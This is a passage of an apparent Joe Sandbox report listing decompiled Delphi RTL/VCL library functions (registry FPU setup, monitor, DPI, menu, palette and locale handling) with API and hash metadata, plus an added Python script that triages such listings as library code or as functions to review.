                          					_push(0x703154);
                          					return RegCloseKey(_v8);
                          				}
                          			}

                          Address range of the listed statements: 0x007030dd to 0x00703172

                          APIs
                          • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 007030FE
                          • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,0070314D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00703131
                          • RegCloseKey.ADVAPI32(?,00703154,00000000,?,00000004,00000000,0070314D,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00703147
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: CloseOpenQueryValue
                          • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                          • API String ID: 3677997916-4173385793
                          • Opcode ID: 01592294d959cdfafb85e84a41173733b7fec04673162710be5e00e05db9098f
                          • Instruction ID: 07a413150bcc03ad9cbcafd5ccd8403736fb053e208be80768109f20834fc16b
                          • Opcode Fuzzy Hash: 01592294d959cdfafb85e84a41173733b7fec04673162710be5e00e05db9098f
                          • Instruction Fuzzy Hash: F0015279A4474CF9DB11DBA09C52BB9B7ECEB0CB00F500261FA04D65C0E6785A10C658
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 70%
                          			// VCL MultiMon stub for MonitorFromWindow (see the String ID below). While the
                          			// flag at 0x76f91d is set the call is emulated: with MONITOR_DEFAULTTOPRIMARY or
                          			// MONITOR_DEFAULTTONEAREST (low two bits of _a8) set it returns the pseudo-handle
                          			// 0x12340042 (xPRIMARY_MONITOR); otherwise the window rectangle is fetched with
                          			// GetWindowPlacement when L00706A50 (behaves as IsIconic) reports the window as
                          			// minimised, else with GetWindowRect, and handed to E007270E0 (MonitorFromRect
                          			// emulation). With the flag clear, the real export is resolved by E00726F70,
                          			// cached at 0x76f8f8 (which starts out pointing at this stub, 0x727170) and called.
                          			// Library code, not sample-specific logic.
                          			E00727170(void* __edi, struct HWND__* _a4, signed int _a8) {
                          				struct _WINDOWPLACEMENT _v48;
                          				void* __ebx;
                          				void* __esi;
                          				void* __ebp;
                          				signed int _t7;
                          				signed int _t18;
                          				intOrPtr _t20;
                          				struct HWND__* _t22;
                          
                          				_t18 = _a8;
                          				_t22 = _a4;
                          				if( *0x76f91d != 0) {
                          					_t7 = _t18 & 0x00000003;
                          					if(_t7 == 0) {
                          						_push(_t22);
                          						L00706A50();
                          						if(_t7 == 0) {
                          							GetWindowRect(_t22,  &(_v48.rcNormalPosition));
                          						} else {
                          							GetWindowPlacement(_t22,  &_v48);
                          						}
                          						return E007270E0( &(_v48.rcNormalPosition), _t18);
                          					}
                          					return 0x12340042;
                          				}
                          				_t20 =  *0x76f8f8; // 0x727170
                          				 *0x76f8f8 = E00726F70(1, _t18, _t20, __edi, _t22);
                          				return  *0x76f8f8(_t22, _t18);
                          			}

                          Address range of the listed statements: 0x00727178 to 0x007271dd

                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: AddressProc
                          • String ID: MonitorFromWindow$pqr
                          • API String ID: 190572456-1379931791
                          • Opcode ID: a9e0a2136a06482a5d339ccb6a13c5a40cc19d5c01d889b6380bdabe0b0ab130
                          • Instruction ID: 3b848d76153aa02cfba2cff0608a2879bf3cbcb5d270218cdb1d7a6de4cd18f3
                          • Opcode Fuzzy Hash: a9e0a2136a06482a5d339ccb6a13c5a40cc19d5c01d889b6380bdabe0b0ab130
                          • Instruction Fuzzy Hash: CA01AD7150922DAB8704EB54BD869AF73ACEF41350B648166F82193241DB2C9E20C7A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 87%
                          			// Consistent with VCL form loading and its DPI scaling (inference from the MulDiv
                          			// pattern): the pixels-per-inch stored with the form at +0x25c is compared with
                          			// the screen value at *0x76fb20+0x40 (0x60 = 96 dpi in this run), and when the
                          			// design value at +0x270 differs from the current one (L00731A7C) the dimensions
                          			// are rescaled as MulDiv(old, new, design); the flag bits tested at +0x98 select
                          			// which of them. Library code rather than sample-specific logic.
                          			E007316F4(intOrPtr __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                          				intOrPtr _v8;
                          				signed char _t92;
                          				int _t98;
                          				int _t100;
                          				intOrPtr _t117;
                          				int _t122;
                          				intOrPtr _t155;
                          				void* _t164;
                          				signed char _t180;
                          				intOrPtr _t182;
                          				intOrPtr _t194;
                          				int _t199;
                          				intOrPtr _t203;
                          				void* _t204;
                          
                          				_t204 = __eflags;
                          				_t202 = _t203;
                          				_push(__ecx);
                          				_v8 = __eax;
                          				L007498E4(_v8);
                          				_push(_t203);
                          				_push(0x73194a);
                          				_push( *[fs:edx]);
                          				 *[fs:edx] = _t203;
                          				 *(_v8 + 0x268) = 0;
                          				 *(_v8 + 0x26c) = 0;
                          				 *(_v8 + 0x270) = 0;
                          				_t164 = 0;
                          				_t92 =  *0x76f665; // 0x0
                          				 *(_v8 + 0x234) = _t92 ^ 0x00000001;
                          				E00749040(_v8, 0, __ecx, __edx, _t204);
                          				if( *(_v8 + 0x25c) == 0 ||  *(_v8 + 0x270) <= 0) {
                          					L12:
                          					_t98 =  *(_v8 + 0x268);
                          					_t213 = _t98;
                          					if(_t98 > 0) {
                          						E00746348(_v8, _t98, _t213);
                          					}
                          					_t100 =  *(_v8 + 0x26c);
                          					_t214 = _t100;
                          					if(_t100 > 0) {
                          						E0074638C(_v8, _t100, _t214);
                          					}
                          					_t180 =  *0x731958; // 0x0
                          					 *(_v8 + 0x98) = _t180;
                          					_t215 = _t164;
                          					if(_t164 == 0) {
                          						E00730D54(_v8, 1, 1);
                          						E0074CAA4(_v8, 1, 1, _t215);
                          					}
                          					L00747A98(_v8, 0, 0xb03d, 0);
                          					_pop(_t182);
                          					 *[fs:eax] = _t182;
                          					_push(0x731951);
                          					return L007498EC(_v8);
                          				} else {
                          					if(( *(_v8 + 0x98) & 0x00000010) != 0) {
                          						_t194 =  *0x76fb20; // 0x23f1458
                          						_t22 = _t194 + 0x40; // 0x60
                          						if( *(_v8 + 0x25c) !=  *_t22) {
                          							_t155 =  *0x76fb20; // 0x23f1458
                          							_t25 = _t155 + 0x40; // 0x60
                          							E0072010C( *((intOrPtr*)(_v8 + 0x68)), MulDiv(E00720104( *((intOrPtr*)(_v8 + 0x68))),  *_t25,  *(_v8 + 0x25c)), __edi, _t202);
                          						}
                          					}
                          					_t117 =  *0x76fb20; // 0x23f1458
                          					_t28 = _t117 + 0x40; // 0x60
                          					 *(_v8 + 0x25c) =  *_t28;
                          					_t199 = L00731A7C(_v8);
                          					_t122 =  *(_v8 + 0x270);
                          					_t209 = _t199 - _t122;
                          					if(_t199 != _t122) {
                          						_t164 = 1;
                          						E00730D54(_v8, _t122, _t199);
                          						E0074CAA4(_v8,  *(_v8 + 0x270), _t199, _t209);
                          						if(( *(_v8 + 0x98) & 0x00000004) != 0) {
                          							 *(_v8 + 0x268) = MulDiv( *(_v8 + 0x268), _t199,  *(_v8 + 0x270));
                          						}
                          						if(( *(_v8 + 0x98) & 0x00000008) != 0) {
                          							 *(_v8 + 0x26c) = MulDiv( *(_v8 + 0x26c), _t199,  *(_v8 + 0x270));
                          						}
                          						if(( *(_v8 + 0x98) & 0x00000020) != 0) {
                          							 *(_v8 + 0x1fa) = MulDiv( *(_v8 + 0x1fa), _t199,  *(_v8 + 0x270));
                          							 *(_v8 + 0x1fe) = MulDiv( *(_v8 + 0x1fe), _t199,  *(_v8 + 0x270));
                          						}
                          					}
                          					goto L12;
                          				}
                          			}

                          Address range of the listed statements: 0x007316f4 to 0x00731949

                          APIs
                          • MulDiv.KERNEL32(00000000,00000060,00000000), ref: 007317B3
                          • MulDiv.KERNEL32(?,00000000,00000000), ref: 0073182F
                          • MulDiv.KERNEL32(?,00000000,00000000), ref: 0073185E
                          • MulDiv.KERNEL32(?,00000000,00000000), ref: 0073188D
                          • MulDiv.KERNEL32(?,00000000,00000000), ref: 007318B0
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4068df9692f0d4c6f6f88d7f41f67585a250aba446e9aad2316df998304fe3f4
                          • Instruction ID: 96016d34377869e04d6cbd22c89543125e24af7a8dfdd51acdb0da9b4d8ee2b0
                          • Opcode Fuzzy Hash: 4068df9692f0d4c6f6f88d7f41f67585a250aba446e9aad2316df998304fe3f4
                          • Instruction Fuzzy Hash: 9971C474B04148EFDB44DBA8C599AADB7F5AF48300F6941F4E808DB362C779AE41DB40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			// Matches the structure of VCL TMenuItem.RebuildHandle (inference): the bits
                          			// tested at +0x1c are the component state (8 = csDestroying: exit; 2 = csReading:
                          			// defer by setting the byte at +0x74); with a parent at +0x6c the call recurses
                          			// into it; otherwise the menu items are walked from last to first and those whose
                          			// GetMenuState (MF_BYPOSITION = 0x400) lacks the 0x4 bit (MF_BITMAP) are removed,
                          			// after which the menu is repopulated (E0073CF44 plus the virtual call at vtable
                          			// +0x3c) or, when it is empty, the handle at +0x34 is destroyed. Library code,
                          			// not sample-specific logic.
                          			E0073D084(int __eax, void* __edx) {
                          				void* __edi;
                          				void* __esi;
                          				signed int _t39;
                          				signed int _t40;
                          				intOrPtr _t44;
                          				int _t45;
                          				void* _t47;
                          				int _t48;
                          				intOrPtr* _t49;
                          
                          				_t18 = __eax;
                          				_t49 = __eax;
                          				if(( *(__eax + 0x1c) & 0x00000008) == 0) {
                          					if(( *(__eax + 0x1c) & 0x00000002) != 0) {
                          						 *((char*)(__eax + 0x74)) = 1;
                          						return __eax;
                          					}
                          					_t19 =  *((intOrPtr*)(__eax + 0x6c));
                          					if( *((intOrPtr*)(__eax + 0x6c)) != 0) {
                          						return E0073D084(_t19, __edx);
                          					}
                          					_t18 = GetMenuItemCount(E0073D1B4(__eax, _t45, _t47));
                          					_t48 = _t18;
                          					_t40 = _t39 & 0xffffff00 | _t48 == 0x00000000;
                          					while(_t48 > 0) {
                          						_t45 = _t48 - 1;
                          						_t18 = GetMenuState(E0073D1B4(_t49, _t45, _t48), _t45, 0x400);
                          						if((_t18 & 0x00000004) == 0) {
                          							_t18 = RemoveMenu(E0073D1B4(_t49, _t45, _t48), _t45, 0x400);
                          							_t40 = 1;
                          						}
                          						_t48 = _t48 - 1;
                          					}
                          					if(_t40 != 0) {
                          						if( *((intOrPtr*)(_t49 + 0x64)) != 0) {
                          							L14:
                          							E0073CF44(_t49, _t45, _t48);
                          							L15:
                          							return  *((intOrPtr*)( *_t49 + 0x3c))();
                          						}
                          						_t44 =  *0x73bb98; // 0x73bbe4
                          						if(E00703400( *((intOrPtr*)(_t49 + 0x70)), _t44) == 0 || GetMenuItemCount(E0073D1B4(_t49, _t45, _t48)) != 0) {
                          							goto L14;
                          						} else {
                          							DestroyMenu( *(_t49 + 0x34));
                          							 *(_t49 + 0x34) = 0;
                          							goto L15;
                          						}
                          					}
                          				}
                          				return _t18;
                          			}

                          Address range of the listed statements: 0x0073d084 to 0x0073d151

                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c35870be57108ef0f7403ce5b6fafb0f66f3ac5847b7bd1b9ef545919c9f07e5
                          • Instruction ID: edad73f9693a3c98a607ad443b4b80a089900d94b221b27df27116910cacef72
                          • Opcode Fuzzy Hash: c35870be57108ef0f7403ce5b6fafb0f66f3ac5847b7bd1b9ef545919c9f07e5
                          • Instruction Fuzzy Hash: B6118EB170125DDBFB30AA39AD0DB5A36A85F81B88F164128BD41DB283DB6DDC068790
                          Uniqueness

                          Uniqueness Score: -1.00%
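
Working through listings like the ones in this section, the first question is which functions are compiler runtime (Delphi RTL/VCL) and which belong to the sample. The Python script below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses the per-function metadata the report prints (the APIs list, the Similarity "API ID" and "String ID" fields, the decompilation quality) and tags each function from a small signature table. The table and the tag names are the editor's own assumptions; the constructed input is made of lines copied from the E007030DC, E00727170 and E0072539C listings in this section, with argument lists shortened.

```python
"""Triage helper for the 'C-Code' listings of a Joe Sandbox report (added example).

Parses the metadata printed next to each decompiled function (APIs list,
Similarity 'API ID' / 'String ID', decompilation quality) and tags the function
as Delphi RTL/VCL library code or as code that still needs a reverser.
The signature rules below are the editor's own heuristics, not the report's.
"""
import re
from dataclasses import dataclass, field

QUALITY_RE = re.compile(r"C-Code - Quality: (\d+)%")
FUNC_RE = re.compile(r"^\s*(E[0-9A-F]{8})\(")                   # function header
API_RE = re.compile(r"^\s*•\s*([0-9A-Za-z_]+)\.([A-Z0-9]+)\(")  # "• Name.DLL(args), ref: ..."
UNRESOLVED_RE = re.compile(r"^[0-9A-F]{8}\.")                   # import shown only by address


@dataclass
class FunctionMeta:
    name: str
    quality: int = 0
    apis: list = field(default_factory=list)   # entries of the form "Name.DLL"
    api_id: str = ""
    string_id: str = ""


def parse_listing(text):
    """One FunctionMeta per 'C-Code' block; the first E........( line after the
    quality header is the function itself, later ones are calls in its body."""
    funcs, cur, quality = [], None, 0
    for line in text.splitlines():
        m = QUALITY_RE.search(line)
        if m:
            quality, cur = int(m.group(1)), None
            continue
        m = FUNC_RE.match(line)
        if m and cur is None:
            cur = FunctionMeta(m.group(1), quality)
            funcs.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            cur.apis.append(f"{m.group(1)}.{m.group(2)}")
        elif line.strip().startswith("• API ID:"):
            cur.api_id = line.split(":", 1)[1].strip()
        elif line.strip().startswith("• String ID:"):
            cur.string_id = line.split(":", 1)[1].strip()
    return funcs


def unresolved_imports(fn):
    """Imports the report shows by address only, e.g. '7378AC50.USER32'."""
    return [a for a in fn.apis if UNRESOLVED_RE.match(a)]


def classify(fn):
    """(tag, reason); a tag ending in '?' is a structural match to confirm, not proof."""
    names = {a.split(".")[0] for a in fn.apis}
    if "FPUMaskValue" in fn.string_id:
        return "delphi-rtl", "x87 control-word init from HKLM\\SOFTWARE\\Borland\\Delphi\\RTL"
    if "MonitorFromWindow" in fn.string_id:
        return "delphi-vcl", "MultiMon stub (0x12340042 = xPRIMARY_MONITOR)"
    if {"GetCurrentThreadId", "RtlEnterCriticalSection", "InterlockedExchange"} <= names:
        return "delphi-rtl?", "Classes.CheckSynchronize-style queue swap"
    if "CreateHalftonePalette" in names:
        return "delphi-vcl?", "Graphics-unit palette handling"
    if names and names <= {"MulDiv"}:
        return "delphi-vcl?", "form DPI scaling"
    return "review", "no library signature matched"


def triage(text):
    """Rows of (function, tag, reason, number of unresolved imports)."""
    return [(fn.name, *classify(fn), len(unresolved_imports(fn)))
            for fn in parse_listing(text)]


# Constructed input: metadata lines copied from three listings in this section.
SAMPLE = r"""
C-Code - Quality: 65%
			E007030DC() {
APIs
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 007030FE
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004), ref: 00703131
• RegCloseKey.ADVAPI32(?,00703154), ref: 00703147
Similarity
• API ID: CloseOpenQueryValue
• String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
C-Code - Quality: 70%
			E00727170(void* __edi, struct HWND__* _a4, signed int _a8) {
Similarity
• API ID: AddressProc
• String ID: MonitorFromWindow$pqr
C-Code - Quality: 78%
			E0072539C(struct HPALETTE__* __eax) {
APIs
• 7378AC50.USER32(00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 007253F2
• 7378AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725407
• CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725435
• 7378B380.USER32(00000000,00000000,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725440
"""

if __name__ == "__main__":
    for name, tag, reason, n_unres in triage(SAMPLE):
        print(f"{name}  {tag:<12} {reason}  unresolved imports: {n_unres}")
```

Functions tagged "review", and any function with unresolved imports (APIs the report shows only by address, such as 7378AC50.USER32), are where analyst time goes; a tag ending in "?" is a structural match that should be confirmed against the Delphi sources or a known-good Delphi binary before the function is written off as library code.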

                          C-Code - Quality: 78%
                          			// Bitmap palette realisation in the style of the VCL Graphics unit (inference).
                          			// The three imports the report lists only by address are, judging by their
                          			// arguments, GetDC(0) (7378AC50.USER32), GetDeviceCaps(dc, 0xC = BITSPIXEL) and
                          			// GetDeviceCaps(dc, 0xE = PLANES) (7378AD70.GDI32) and ReleaseDC(0, dc)
                          			// (7378B380.USER32). E00721864 builds a palette of 1 << bit-count (+0x3e) entries
                          			// from the image's colour table; CreateHalftonePalette is the fallback when that
                          			// fails and the device-depth check (cached in the byte at +0x71) passes.
                          			// Library code, not sample-specific logic.
                          			E0072539C(struct HPALETTE__* __eax) {
                          				struct HPALETTE__* _t21;
                          				char _t28;
                          				signed int _t30;
                          				struct HPALETTE__* _t36;
                          				struct HPALETTE__* _t37;
                          				struct HDC__* _t38;
                          				intOrPtr _t39;
                          
                          				_t21 = __eax;
                          				_t36 = __eax;
                          				_t39 =  *((intOrPtr*)(__eax + 0x28));
                          				if( *((char*)(__eax + 0x30)) == 0 &&  *(_t39 + 0x10) == 0 &&  *((intOrPtr*)(_t39 + 0x14)) != 0) {
                          					_t22 =  *((intOrPtr*)(_t39 + 0x14));
                          					if( *((intOrPtr*)(_t39 + 0x14)) ==  *((intOrPtr*)(_t39 + 8))) {
                          						L00723D10(_t22);
                          					}
                          					_t21 = E00721864( *((intOrPtr*)(_t39 + 0x14)), 1 <<  *(_t39 + 0x3e));
                          					_t37 = _t21;
                          					 *(_t39 + 0x10) = _t37;
                          					if(_t37 == 0) {
                          						_push(0);
                          						L007068E8();
                          						_t21 = E00721174(_t21);
                          						_t38 = _t21;
                          						if( *((char*)(_t39 + 0x71)) != 0) {
                          							L9:
                          							_t28 = 1;
                          						} else {
                          							_push(0xc);
                          							_push(_t38);
                          							L00706630();
                          							_push(0xe);
                          							_push(_t38);
                          							L00706630();
                          							_t30 = _t21 * _t21;
                          							_t21 = ( *(_t39 + 0x2a) & 0x0000ffff) * ( *(_t39 + 0x28) & 0x0000ffff);
                          							if(_t30 < _t21) {
                          								goto L9;
                          							} else {
                          								_t28 = 0;
                          							}
                          						}
                          						 *((char*)(_t39 + 0x71)) = _t28;
                          						if(_t28 != 0) {
                          							_t21 = CreateHalftonePalette(_t38);
                          							 *(_t39 + 0x10) = _t21;
                          						}
                          						_push(_t38);
                          						_push(0);
                          						L00706B28();
                          						if( *(_t39 + 0x10) == 0) {
                          							 *((char*)(_t36 + 0x30)) = 1;
                          							return _t21;
                          						}
                          					}
                          				}
                          				return _t21;
                          			}

                          Address range of the listed statements: 0x0072539c to 0x00725453

                          APIs
                          • 7378AC50.USER32(00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 007253F2
                          • 7378AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725407
                          • 7378AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725411
                          • CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725435
                          • 7378B380.USER32(00000000,00000000,00000000,?,?,?,?,00723EE7,00000000,00723F73), ref: 00725440
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: 7378$B380CreateHalftonePalette
                          • String ID:
                          • API String ID: 2666310534-0
                          • Opcode ID: acae64d93c69d4f579c4e5cee771769023839340d76377000ce6735ad1740363
                          • Instruction ID: f9e042ebec5d654508d4ad1b7d742003bf176abe46f588549f447b64cda21633
                          • Opcode Fuzzy Hash: acae64d93c69d4f579c4e5cee771769023839340d76377000ce6735ad1740363
                          • Instruction Fuzzy Hash: 421190216416F9EBDB20FF34A849BEE7AD1AF51752F041225F9009A2C1D7BC8CE4C3A1
Uniqueness
• Uniqueness Score: -1.00%

                          C-Code - Quality: 40%
                          			E007217CC(intOrPtr __eax) {
                          				char _v5;
                          				intOrPtr _v12;
                          				intOrPtr _t14;
                          				intOrPtr _t16;
                          				intOrPtr _t18;
                          				intOrPtr _t21;
                          				intOrPtr _t30;
                          				void* _t32;
                          				void* _t34;
                          				intOrPtr _t35;
                          
                          				_t32 = _t34;
                          				_t35 = _t34 + 0xfffffff8;
                          				_v5 = 0;
                          				if( *0x76f894 == 0) {
                          					return _v5;
                          				} else {
                          					_push(0);
                          					L007068E8();
                          					_v12 = __eax;
                          					_push(_t32);
                          					_push(0x721852);
                          					_push( *[fs:edx]);
                          					 *[fs:edx] = _t35;
                          					_push(0x68);
                          					_t14 = _v12;
                          					_push(_t14);
                          					L00706630();
                          					if(_t14 >= 0x10) {
                          						_push(__eax + 4);
                          						_push(8);
                          						_push(0);
                          						_t18 =  *0x76f894; // 0x5e0805c0
                          						_push(_t18);
                          						L00706658();
                          						_push(__eax + ( *(__eax + 2) & 0x0000ffff) * 4 - 0x1c);
                          						_push(8);
                          						_push(8);
                          						_t21 =  *0x76f894; // 0x5e0805c0
                          						_push(_t21);
                          						L00706658();
                          						_v5 = 1;
                          					}
                          					_pop(_t30);
                          					 *[fs:eax] = _t30;
                          					_push(0x721859);
                          					_t16 = _v12;
                          					_push(_t16);
                          					_push(0);
                          					L00706B28();
                          					return _t16;
                          				}
                          			}

                          APIs
                          • 7378AC50.USER32(00000000), ref: 007217E4
                          • 7378AD70.GDI32(?,00000068,00000000,00721852,?,00000000), ref: 00721800
                          • 7378AEA0.GDI32(5E0805C0,00000000,00000008,?,?,00000068,00000000,00721852,?,00000000), ref: 00721818
                          • 7378AEA0.GDI32(5E0805C0,00000008,00000008,?,5E0805C0,00000000,00000008,?,?,00000068,00000000,00721852,?,00000000), ref: 00721830
                          • 7378B380.USER32(00000000,?,00721859,00721852,?,00000000), ref: 0072184C
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: 7378$B380
                          • String ID:
                          • API String ID: 817970651-0
                          • Opcode ID: e1a0d00971f83c9e7bc2ffe8ca0322a56074a6f61a0afcfb7ad87e16cdb38137
                          • Instruction ID: d65ba3dd82c649e8fd1b5b130be224cae77dcafece97de6616441ff4e4ea93ed
                          • Opcode Fuzzy Hash: e1a0d00971f83c9e7bc2ffe8ca0322a56074a6f61a0afcfb7ad87e16cdb38137
                          • Instruction Fuzzy Hash: 4A11A571548344FEFB00DFA4AC96B6D77E8F745710F8480A5F5189B5C1DA7A54148720
Uniqueness
• Uniqueness Score: -1.00%

                          C-Code - Quality: 64%
                          			E0070B3D0(void* __esi, void* __eflags) {
                          				char _v8;
                          				intOrPtr* _t18;
                          				intOrPtr _t26;
                          				void* _t27;
                          				long _t29;
                          				intOrPtr _t32;
                          				void* _t33;
                          
                          				_t33 = __eflags;
                          				_push(0);
                          				_push(_t32);
                          				_push(0x70b467);
                          				_push( *[fs:eax]);
                          				 *[fs:eax] = _t32;
                          				E0070B148(GetThreadLocale(), 0x70b47c, 0x100b,  &_v8);
                          				_t29 = E007083E8(0x70b47c, 1, _t33);
                          				if(_t29 + 0xfffffffd - 3 < 0) {
                          					EnumCalendarInfoA(E0070B31C, GetThreadLocale(), _t29, 4);
                          					_t27 = 7;
                          					_t18 = 0x76f770;
                          					do {
                          						 *_t18 = 0xffffffff;
                          						_t18 = _t18 + 4;
                          						_t27 = _t27 - 1;
                          					} while (_t27 != 0);
                          					EnumCalendarInfoA(E0070B358, GetThreadLocale(), _t29, 3);
                          				}
                          				_pop(_t26);
                          				 *[fs:eax] = _t26;
                          				_push(E0070B46E);
                          				return E00704068( &_v8);
                          			}

                          APIs
                          • GetThreadLocale.KERNEL32(?,00000000,0070B467,?,?,00000000), ref: 0070B3E8
                            • Part of subcall function 0070B148: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0070B166
                          • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0070B467,?,?,00000000), ref: 0070B418
                          • EnumCalendarInfoA.KERNEL32(Function_0000B31C,00000000,00000000,00000004), ref: 0070B423
                          • GetThreadLocale.KERNEL32(00000000,00000003,00000000,0070B467,?,?,00000000), ref: 0070B441
                          • EnumCalendarInfoA.KERNEL32(Function_0000B358,00000000,00000000,00000003), ref: 0070B44C
                          Memory Dump Source
                          • Source File: 00000000.00000002.775264910.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
• Associated: 00000000.00000002.775253434.0000000000700000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775702065.000000000076C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.775782547.0000000000773000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_loaddll32.jbxd
                          Similarity
                          • API ID: Locale$InfoThread$CalendarEnum
                          • String ID:
                          • API String ID: 4102113445-0
                          • Opcode ID: 9270be800a916f4d93f8e2b4be87904f7044183772d05854830ef12e35bf4c32
                          • Instruction ID: e319f86c00134b4a6ca58c0aa70f3a5db1a558c3bd020e20282120b4008c71b4
                          • Opcode Fuzzy Hash: 9270be800a916f4d93f8e2b4be87904f7044183772d05854830ef12e35bf4c32
                          • Instruction Fuzzy Hash: A001D6B1240644EFE711B774CC27B5EB2DCDB86B50FA14770F500A66D2EB6C9F1082A1
Uniqueness
• Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E007371C0() {
                          				void* _t2;
                          				void* _t5;
                          				void* _t8;
                          				struct HHOOK__* _t10;
                          
                          				if( *0x76fb34 != 0) {
                          					_t10 =  *0x76fb34; // 0x0
                          					UnhookWindowsHookEx(_t10);
                          				}
                          				 *0x76fb34 = 0;
                          				if( *0x76fb38 != 0) {
                          					_t2 =  *0x76fb30; // 0x0
                          					SetEvent(_t2);
                          					if(GetCurrentThreadId() !=  *0x76fb2c) {
                          						_t8 =  *0x76fb38; // 0x0
                          						WaitForSingleObject(_t8, 0xffffffff);
                          					}
                          					_t5 =  *0x76fb38; // 0x0
                          					CloseHandle(_t5);
                          					 *0x76fb38 = 0;
                          					return 0;
                          				}
                          				return 0;
                          			}

                          APIs
                          • UnhookWindowsHookEx.USER32(00000000), ref: 007371CF
                          • SetEvent.KERNEL32(00000000,007393BA,00000000,0073925E), ref: 007371EA
                          • GetCurrentThreadId.KERNEL32 ref: 007371EF
                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,007393BA,00000000,0073925E), ref: 00737204
                          • CloseHandle.KERNEL32(00000000,00000000,007393BA,00000000,0073925E), ref: 0073720F
